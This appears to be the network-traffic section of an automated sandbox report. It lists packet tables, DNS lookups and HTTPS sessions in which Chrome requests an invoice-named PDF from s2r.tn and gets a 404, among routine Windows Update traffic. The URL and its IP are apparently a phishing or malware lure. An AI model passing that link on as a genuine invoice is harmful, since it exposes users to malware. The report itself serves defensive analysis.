May 23, 2024 18:32:38.598980904 CEST	64819	443	192.168.2.4	20.12.23.50
May 23, 2024 18:32:38.599066973 CEST	64819	443	192.168.2.4	20.12.23.50
May 23, 2024 18:32:38.599083900 CEST	443	64819	20.12.23.50	192.168.2.4
May 23, 2024 18:32:38.599095106 CEST	64819	443	192.168.2.4	20.12.23.50
May 23, 2024 18:32:38.599101067 CEST	443	64819	20.12.23.50	192.168.2.4
May 23, 2024 18:32:39.684799910 CEST	64820	443	192.168.2.4	40.127.169.103
May 23, 2024 18:32:39.684854031 CEST	443	64820	40.127.169.103	192.168.2.4
May 23, 2024 18:32:39.684930086 CEST	64820	443	192.168.2.4	40.127.169.103
May 23, 2024 18:32:39.685323954 CEST	64820	443	192.168.2.4	40.127.169.103
May 23, 2024 18:32:39.685337067 CEST	443	64820	40.127.169.103	192.168.2.4
May 23, 2024 18:32:40.496776104 CEST	443	64820	40.127.169.103	192.168.2.4
May 23, 2024 18:32:40.496949911 CEST	64820	443	192.168.2.4	40.127.169.103
May 23, 2024 18:32:40.498619080 CEST	64820	443	192.168.2.4	40.127.169.103
May 23, 2024 18:32:40.498627901 CEST	443	64820	40.127.169.103	192.168.2.4
May 23, 2024 18:32:40.498914957 CEST	443	64820	40.127.169.103	192.168.2.4
May 23, 2024 18:32:40.500070095 CEST	64820	443	192.168.2.4	40.127.169.103
May 23, 2024 18:32:40.542501926 CEST	443	64820	40.127.169.103	192.168.2.4
May 23, 2024 18:32:40.850109100 CEST	443	64820	40.127.169.103	192.168.2.4
May 23, 2024 18:32:40.850188017 CEST	443	64820	40.127.169.103	192.168.2.4
May 23, 2024 18:32:40.850230932 CEST	443	64820	40.127.169.103	192.168.2.4
May 23, 2024 18:32:40.850308895 CEST	64820	443	192.168.2.4	40.127.169.103
May 23, 2024 18:32:40.850342035 CEST	443	64820	40.127.169.103	192.168.2.4
May 23, 2024 18:32:40.850354910 CEST	64820	443	192.168.2.4	40.127.169.103
May 23, 2024 18:32:40.850393057 CEST	64820	443	192.168.2.4	40.127.169.103
May 23, 2024 18:32:40.861860991 CEST	443	64820	40.127.169.103	192.168.2.4
May 23, 2024 18:32:40.861984015 CEST	64820	443	192.168.2.4	40.127.169.103
May 23, 2024 18:32:40.861994982 CEST	443	64820	40.127.169.103	192.168.2.4
May 23, 2024 18:32:40.862112999 CEST	443	64820	40.127.169.103	192.168.2.4
May 23, 2024 18:32:40.862170935 CEST	64820	443	192.168.2.4	40.127.169.103
May 23, 2024 18:32:40.862236023 CEST	64820	443	192.168.2.4	40.127.169.103
May 23, 2024 18:32:40.862253904 CEST	443	64820	40.127.169.103	192.168.2.4
May 23, 2024 18:32:40.862266064 CEST	64820	443	192.168.2.4	40.127.169.103
May 23, 2024 18:32:40.862271070 CEST	443	64820	40.127.169.103	192.168.2.4
May 23, 2024 18:32:41.029094934 CEST	64821	443	192.168.2.4	40.127.169.103
May 23, 2024 18:32:41.029150009 CEST	443	64821	40.127.169.103	192.168.2.4
May 23, 2024 18:32:41.029227018 CEST	64821	443	192.168.2.4	40.127.169.103
May 23, 2024 18:32:41.029772997 CEST	64821	443	192.168.2.4	40.127.169.103
May 23, 2024 18:32:41.029786110 CEST	443	64821	40.127.169.103	192.168.2.4
May 23, 2024 18:32:41.840065956 CEST	443	64821	40.127.169.103	192.168.2.4
May 23, 2024 18:32:41.840152979 CEST	64821	443	192.168.2.4	40.127.169.103
May 23, 2024 18:32:41.841373920 CEST	64821	443	192.168.2.4	40.127.169.103
May 23, 2024 18:32:41.841382027 CEST	443	64821	40.127.169.103	192.168.2.4
May 23, 2024 18:32:41.841629028 CEST	443	64821	40.127.169.103	192.168.2.4
May 23, 2024 18:32:41.842470884 CEST	64821	443	192.168.2.4	40.127.169.103
May 23, 2024 18:32:41.886497974 CEST	443	64821	40.127.169.103	192.168.2.4
May 23, 2024 18:32:42.208883047 CEST	443	64821	40.127.169.103	192.168.2.4
May 23, 2024 18:32:42.208918095 CEST	443	64821	40.127.169.103	192.168.2.4
May 23, 2024 18:32:42.208935022 CEST	443	64821	40.127.169.103	192.168.2.4
May 23, 2024 18:32:42.209000111 CEST	64821	443	192.168.2.4	40.127.169.103
May 23, 2024 18:32:42.209039927 CEST	443	64821	40.127.169.103	192.168.2.4
May 23, 2024 18:32:42.209068060 CEST	64821	443	192.168.2.4	40.127.169.103
May 23, 2024 18:32:42.209085941 CEST	64821	443	192.168.2.4	40.127.169.103
May 23, 2024 18:32:42.220045090 CEST	443	64821	40.127.169.103	192.168.2.4
May 23, 2024 18:32:42.220101118 CEST	443	64821	40.127.169.103	192.168.2.4
May 23, 2024 18:32:42.220124006 CEST	64821	443	192.168.2.4	40.127.169.103
May 23, 2024 18:32:42.220132113 CEST	443	64821	40.127.169.103	192.168.2.4
May 23, 2024 18:32:42.220165014 CEST	443	64821	40.127.169.103	192.168.2.4
May 23, 2024 18:32:42.220172882 CEST	64821	443	192.168.2.4	40.127.169.103
May 23, 2024 18:32:42.220210075 CEST	64821	443	192.168.2.4	40.127.169.103
May 23, 2024 18:32:42.220227957 CEST	64821	443	192.168.2.4	40.127.169.103
May 23, 2024 18:32:42.220244884 CEST	443	64821	40.127.169.103	192.168.2.4
May 23, 2024 18:32:42.220256090 CEST	64821	443	192.168.2.4	40.127.169.103
May 23, 2024 18:32:42.220259905 CEST	443	64821	40.127.169.103	192.168.2.4
May 23, 2024 18:33:05.190124035 CEST	64823	443	192.168.2.4	142.250.185.68
May 23, 2024 18:33:05.190171003 CEST	443	64823	142.250.185.68	192.168.2.4
May 23, 2024 18:33:05.190260887 CEST	64823	443	192.168.2.4	142.250.185.68
May 23, 2024 18:33:05.190511942 CEST	64823	443	192.168.2.4	142.250.185.68
May 23, 2024 18:33:05.190526009 CEST	443	64823	142.250.185.68	192.168.2.4
May 23, 2024 18:33:05.857585907 CEST	443	64823	142.250.185.68	192.168.2.4
May 23, 2024 18:33:05.857896090 CEST	64823	443	192.168.2.4	142.250.185.68
May 23, 2024 18:33:05.857918024 CEST	443	64823	142.250.185.68	192.168.2.4
May 23, 2024 18:33:05.858378887 CEST	443	64823	142.250.185.68	192.168.2.4
May 23, 2024 18:33:05.858680010 CEST	64823	443	192.168.2.4	142.250.185.68
May 23, 2024 18:33:05.858766079 CEST	443	64823	142.250.185.68	192.168.2.4
May 23, 2024 18:33:05.900712967 CEST	64823	443	192.168.2.4	142.250.185.68
May 23, 2024 18:33:11.822377920 CEST	49723	80	192.168.2.4	93.184.221.240
May 23, 2024 18:33:11.822381020 CEST	49724	80	192.168.2.4	93.184.221.240
May 23, 2024 18:33:11.832863092 CEST	80	49724	93.184.221.240	192.168.2.4
May 23, 2024 18:33:11.834269047 CEST	49724	80	192.168.2.4	93.184.221.240
May 23, 2024 18:33:11.838984966 CEST	80	49723	93.184.221.240	192.168.2.4
May 23, 2024 18:33:11.842259884 CEST	49723	80	192.168.2.4	93.184.221.240
May 23, 2024 18:33:15.753818989 CEST	443	64823	142.250.185.68	192.168.2.4
May 23, 2024 18:33:15.753886938 CEST	443	64823	142.250.185.68	192.168.2.4
May 23, 2024 18:33:15.753933907 CEST	64823	443	192.168.2.4	142.250.185.68
May 23, 2024 18:33:16.854010105 CEST	64823	443	192.168.2.4	142.250.185.68
May 23, 2024 18:33:16.854038954 CEST	443	64823	142.250.185.68	192.168.2.4
May 23, 2024 18:34:05.245644093 CEST	64825	443	192.168.2.4	142.250.185.68
May 23, 2024 18:34:05.245695114 CEST	443	64825	142.250.185.68	192.168.2.4
May 23, 2024 18:34:05.246357918 CEST	64825	443	192.168.2.4	142.250.185.68
May 23, 2024 18:34:05.247229099 CEST	64825	443	192.168.2.4	142.250.185.68
May 23, 2024 18:34:05.247245073 CEST	443	64825	142.250.185.68	192.168.2.4
May 23, 2024 18:34:05.934288025 CEST	443	64825	142.250.185.68	192.168.2.4
May 23, 2024 18:34:05.976968050 CEST	64825	443	192.168.2.4	142.250.185.68

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 23, 2024 18:32:02.446078062 CEST	51344	53	192.168.2.4	1.1.1.1
May 23, 2024 18:32:02.446321011 CEST	57780	53	192.168.2.4	1.1.1.1
May 23, 2024 18:32:02.450130939 CEST	53	60794	1.1.1.1	192.168.2.4
May 23, 2024 18:32:02.500382900 CEST	53	58198	1.1.1.1	192.168.2.4
May 23, 2024 18:32:03.462583065 CEST	59112	53	192.168.2.4	1.1.1.1
May 23, 2024 18:32:03.462717056 CEST	50537	53	192.168.2.4	1.1.1.1
May 23, 2024 18:32:03.573322058 CEST	53	58657	1.1.1.1	192.168.2.4
May 23, 2024 18:32:05.002454996 CEST	53	57780	1.1.1.1	192.168.2.4
May 23, 2024 18:32:05.118824959 CEST	59917	53	192.168.2.4	1.1.1.1
May 23, 2024 18:32:05.119105101 CEST	60355	53	192.168.2.4	1.1.1.1
May 23, 2024 18:32:05.127114058 CEST	53	59917	1.1.1.1	192.168.2.4
May 23, 2024 18:32:05.131947041 CEST	53	60355	1.1.1.1	192.168.2.4
May 23, 2024 18:32:05.373684883 CEST	53	51344	1.1.1.1	192.168.2.4
May 23, 2024 18:32:05.451298952 CEST	53	59112	1.1.1.1	192.168.2.4
May 23, 2024 18:32:06.284430981 CEST	53	50537	1.1.1.1	192.168.2.4
May 23, 2024 18:32:21.742372990 CEST	53	59622	1.1.1.1	192.168.2.4
May 23, 2024 18:32:23.388550043 CEST	138	138	192.168.2.4	192.168.2.255
May 23, 2024 18:32:34.503246069 CEST	53	49710	162.159.36.2	192.168.2.4
May 23, 2024 18:32:35.076941967 CEST	60025	53	192.168.2.4	1.1.1.1
May 23, 2024 18:32:35.087784052 CEST	53	60025	1.1.1.1	192.168.2.4
May 23, 2024 18:32:37.707279921 CEST	56360	53	192.168.2.4	1.1.1.1
May 23, 2024 18:32:37.715276003 CEST	53	56360	1.1.1.1	192.168.2.4
May 23, 2024 18:33:05.180866003 CEST	54789	53	192.168.2.4	1.1.1.1
May 23, 2024 18:33:05.189059019 CEST	53	54789	1.1.1.1	192.168.2.4

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
May 23, 2024 18:32:05.451756954 CEST	192.168.2.4	1.1.1.1	c1ec	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 23, 2024 18:32:02.446078062 CEST	192.168.2.4	1.1.1.1	0xe80b	Standard query (0)	s2r.tn	A (IP address)	IN (0x0001)	false
May 23, 2024 18:32:02.446321011 CEST	192.168.2.4	1.1.1.1	0x37f1	Standard query (0)	s2r.tn	65	IN (0x0001)	false
May 23, 2024 18:32:03.462583065 CEST	192.168.2.4	1.1.1.1	0x4f5a	Standard query (0)	s2r.tn	A (IP address)	IN (0x0001)	false
May 23, 2024 18:32:03.462717056 CEST	192.168.2.4	1.1.1.1	0xaf80	Standard query (0)	s2r.tn	65	IN (0x0001)	false
May 23, 2024 18:32:05.118824959 CEST	192.168.2.4	1.1.1.1	0xf964	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
May 23, 2024 18:32:05.119105101 CEST	192.168.2.4	1.1.1.1	0x2998	Standard query (0)	www.google.com	65	IN (0x0001)	false
May 23, 2024 18:32:35.076941967 CEST	192.168.2.4	1.1.1.1	0xcb8b	Standard query (0)	18.31.95.13.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
May 23, 2024 18:32:37.707279921 CEST	192.168.2.4	1.1.1.1	0x4fb7	Standard query (0)	50.23.12.20.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
May 23, 2024 18:33:05.180866003 CEST	192.168.2.4	1.1.1.1	0x5dcf	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 23, 2024 18:32:05.127114058 CEST	1.1.1.1	192.168.2.4	0xf964	No error (0)	www.google.com		142.250.185.68	A (IP address)	IN (0x0001)	false
May 23, 2024 18:32:05.131947041 CEST	1.1.1.1	192.168.2.4	0x2998	No error (0)	www.google.com			65	IN (0x0001)	false
May 23, 2024 18:32:05.373684883 CEST	1.1.1.1	192.168.2.4	0xe80b	No error (0)	s2r.tn		70.38.21.234	A (IP address)	IN (0x0001)	false
May 23, 2024 18:32:05.451298952 CEST	1.1.1.1	192.168.2.4	0x4f5a	No error (0)	s2r.tn		70.38.21.234	A (IP address)	IN (0x0001)	false
May 23, 2024 18:32:35.087784052 CEST	1.1.1.1	192.168.2.4	0xcb8b	Name error (3)	18.31.95.13.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
May 23, 2024 18:32:37.715276003 CEST	1.1.1.1	192.168.2.4	0x4fb7	Name error (3)	50.23.12.20.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
May 23, 2024 18:33:05.189059019 CEST	1.1.1.1	192.168.2.4	0x5dcf	No error (0)	www.google.com		142.250.185.68	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

s2r.tn

https:

fs.microsoft.com

slscr.update.microsoft.com

fe3cr.delivery.mp.microsoft.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49739	70.38.21.234	443	7648	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 16:32:05 UTC	669	OUT	GET /cgi/INVOICERVSHA.pdf HTTP/1.1 Host: s2r.tn Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-23 16:32:06 UTC	164	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 16:32:05 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-05-23 16:32:06 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49740	70.38.21.234	443	7648	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 16:32:06 UTC	588	OUT	GET /favicon.ico HTTP/1.1 Host: s2r.tn Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://s2r.tn/cgi/INVOICERVSHA.pdf Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-23 16:32:06 UTC	164	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 16:32:06 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-05-23 16:32:06 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49742	23.43.61.160	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 16:32:07 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-05-23 16:32:08 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus-z1 Cache-Control: public, max-age=257888 Date: Thu, 23 May 2024 16:32:07 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49743	23.43.61.160	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 16:32:08 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-05-23 16:32:09 UTC	535	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y= Cache-Control: public, max-age=257733 Date: Thu, 23 May 2024 16:32:08 GMT Content-Length: 55 Connection: close X-CID: 2
2024-05-23 16:32:09 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49744	20.114.59.183	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 16:32:19 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=2YlOHc98uO8EcM3&MD=X2zFsc+f HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-05-23 16:32:19 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 090be517-c78e-4eae-8f60-cb652b8c307f MS-RequestId: 49723590-f9a0-4220-9512-d27600527491 MS-CV: WNE5ZblEX0yOBBco.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Thu, 23 May 2024 16:32:19 GMT Connection: close Content-Length: 24490
2024-05-23 16:32:19 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-05-23 16:32:19 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	64817	70.38.21.234	443	7648	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 16:32:35 UTC	332	OUT	GET /cgi/INVOICERVSHA.pdf HTTP/1.1 Host: s2r.tn Connection: keep-alive Accept-Encoding: identity Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Language: en-US,en;q=0.9
2024-05-23 16:32:36 UTC	164	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 16:32:36 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-05-23 16:32:36 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	64816	13.95.31.18	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 16:32:35 UTC	142	OUT	GET /clientwebservice/ping HTTP/1.1 Connection: Keep-Alive User-Agent: DNS resiliency checker/1.0 Host: fe3cr.delivery.mp.microsoft.com
2024-05-23 16:32:36 UTC	234	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Expires: -1 Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET X-Content-Type-Options: nosniff Date: Thu, 23 May 2024 16:32:35 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	64819	20.12.23.50	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 16:32:38 UTC	124	OUT	GET /sls/ping HTTP/1.1 Connection: Keep-Alive User-Agent: DNS resiliency checker/1.0 Host: slscr.update.microsoft.com
2024-05-23 16:32:38 UTC	318	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Expires: -1 MS-CV: 63szFpj/7Uux4scg.0 MS-RequestId: e60fe2d0-b238-4b50-a9fd-dc1762361b78 MS-CorrelationId: c843618c-13b3-4232-be1c-9f38a86c7929 X-Content-Type-Options: nosniff Date: Thu, 23 May 2024 16:32:37 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	64820	40.127.169.103	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 16:32:40 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=2YlOHc98uO8EcM3&MD=X2zFsc+f HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
